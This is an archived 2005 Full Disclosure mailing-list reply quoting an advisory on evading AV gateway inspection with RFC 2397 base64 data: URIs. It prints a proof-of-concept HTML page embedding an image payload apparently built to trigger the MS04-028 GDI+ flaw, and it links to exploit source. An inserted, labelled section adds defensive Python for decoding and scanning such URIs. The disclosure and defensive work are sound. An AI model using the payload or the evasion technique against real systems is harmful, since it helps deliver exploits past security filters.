Full Disclosure mailing list archives
Re: Multi-vendor AV gateway image inspection bypass vulnerability
From: Darren Bounds <lists () intrusense com>
Date: Tue, 11 Jan 2005 14:58:43 -0500
Hello Danny,

This vulnerability is only applicable to the HTTP data while in transit. Once received by the client, the image will be rendered and subsequently detected if local AV software is present.
At the present time, I'm not aware of any AV, IDS or IPS vendor that will detect malicious images embedded in HTML in this manner.
Thank you,

Darren Bounds
Intrusense, LLC.

--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well as other security technologies such as IDS and IPS) inspection of HTTP image content. By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme, a remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.

For example: http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee); however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and it is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme, Firefox, Safari, Mozilla and Opera do and will render the data, and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.
## BEGIN HTML ##
<html>
<body>
<img src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD// gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw/ X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF B QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/ bAEMACAYGBwYFCAcHBwkJ CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv /b AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj Iy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/ xAAfAAABBQEBAQEBAQAAAAAAAAAA AQIDBAUGBwgJCgv/ xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2 Rl ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc bH yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/ xAAfAQADAQEBAQEBAQEBAAAAAAAA AQIDBAUGBwgJCgv/ xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm Nk ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8 TF xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/ APn+iiigD//Z">
</body>
</html>
## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response?

...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
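Added example, not part of the original thread and not code from the advisory or from any of the vendors named in it. The gap the advisory describes is that a gateway scanner sees the HTML body but never decodes the RFC 2397 data: URI inside it, so the image bytes reach the browser uninspected. The Python below shows one way a content-inspection layer can close that gap: it extracts data: URIs from an HTML body, parses them per RFC 2397 (optional mediatype, optional ;base64 flag, percent-encoding otherwise), decodes the payload, compares the declared media type with the leading magic bytes (the advisory's own sample declares image/gif but carries JPEG data, which begins FF D8 FF), and hands the decoded bytes to a scan hook. The scan hook, its hash blocklist and the sample HTML are constructed for this example and stand in for a real gateway AV engine.

```python
# Added example: decode RFC 2397 data: URIs found in HTML so the bytes can be
# inspected before they reach the browser. Not code from the advisory or any
# vendor; the scan hook, blocklist and sample HTML below are constructed.
import base64
import hashlib
import re
from dataclasses import dataclass
from typing import Callable, List, Optional
from urllib.parse import unquote_to_bytes

# data: URIs as they appear inside src=, href= or url(...) attribute values.
DATA_URI_RE = re.compile(r"""data:[^"'\s>)]*""", re.IGNORECASE)

# Leading bytes of common image formats, used to compare declared vs actual type.
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
}


@dataclass
class DataUri:
    declared_type: str
    payload: bytes
    sniffed_type: Optional[str]

    @property
    def type_mismatch(self) -> bool:
        # Only a definite sniff counts; unknown formats are left to the scanner.
        return self.sniffed_type is not None and self.sniffed_type != self.declared_type


def parse_data_uri(uri: str) -> DataUri:
    """Parse 'data:[<mediatype>][;base64],<data>' (RFC 2397) into raw bytes.
    Raises ValueError on malformed input so a gateway can block, not skip."""
    if uri[:5].lower() != "data:" or "," not in uri:
        raise ValueError("not a data: URI")
    header, data = uri[5:].split(",", 1)
    params = [p.strip() for p in header.split(";")]
    is_base64 = params[-1].lower() == "base64"
    if is_base64:
        params = params[:-1]
    # RFC 2397: an omitted mediatype defaults to text/plain;charset=US-ASCII.
    declared = params[0].lower() if params and params[0] else "text/plain"
    if is_base64:
        # Drop whitespace from mail wrapping; validate=True rejects characters
        # outside the base64 alphabet (binascii.Error, a ValueError subclass).
        payload = base64.b64decode(re.sub(r"\s+", "", data), validate=True)
    else:
        payload = unquote_to_bytes(data)
    sniffed = next((t for magic, t in MAGIC.items() if payload.startswith(magic)), None)
    return DataUri(declared, payload, sniffed)


def inspect_html(html: str, scan: Callable[[bytes], bool]) -> List[dict]:
    """Decode every data: URI in an HTML body and run `scan` (a hook standing in
    for the gateway AV engine) over the decoded bytes. One finding per URI."""
    findings = []
    for uri in DATA_URI_RE.findall(html):
        try:
            parsed = parse_data_uri(uri)
        except ValueError as exc:
            findings.append({"uri": uri[:32], "verdict": "block",
                             "reason": f"malformed data URI: {exc}"})
            continue
        if parsed.type_mismatch:
            verdict, reason = "block", f"declared {parsed.declared_type}, content is {parsed.sniffed_type}"
        elif scan(parsed.payload):
            verdict, reason = "block", "scanner flagged decoded content"
        else:
            verdict, reason = "allow", "clean"
        findings.append({"uri": uri[:32], "verdict": verdict, "reason": reason,
                         "declared": parsed.declared_type,
                         "actual": parsed.sniffed_type, "size": len(parsed.payload)})
    return findings


# Constructed sample: a real 1x1 GIF, a JPEG header mislabelled as image/gif
# (the shape of the advisory's own example), a percent-encoded text URI, and
# a base64 URI containing characters outside the alphabet.
ONE_PIXEL_GIF_B64 = "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"
JPEG_STUB_B64 = base64.b64encode(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00").decode()
SAMPLE_HTML = f"""<html><body>
<img src="data:image/gif;base64,{ONE_PIXEL_GIF_B64}">
<img src="data:image/gif;base64,{JPEG_STUB_B64}">
<a href="data:,Hello%2C%20World">text</a>
<img src="data:image/png;base64,not*valid*base64">
</body></html>"""

# Constructed stand-in for the AV engine: a hash blocklist seeded with the
# sample GIF, showing that the scanner now sees the decoded image bytes.
DEMO_BLOCKLIST = {hashlib.sha256(base64.b64decode(ONE_PIXEL_GIF_B64)).hexdigest()}


def demo_scan(payload: bytes) -> bool:
    return hashlib.sha256(payload).hexdigest() in DEMO_BLOCKLIST


if __name__ == "__main__":
    for finding in inspect_html(SAMPLE_HTML, demo_scan):
        print(finding["verdict"], finding["reason"])
```

Run stand-alone it prints one verdict per embedded URI: the GIF is blocked by the (constructed) blocklist, the JPEG-as-GIF is blocked on the type mismatch alone, the percent-encoded text is allowed, and the malformed base64 is blocked rather than skipped. Treating a decode failure as a block matters at a gateway: a payload the inspector cannot decode is exactly the one the browser will still try to render.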
Current thread:
- Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)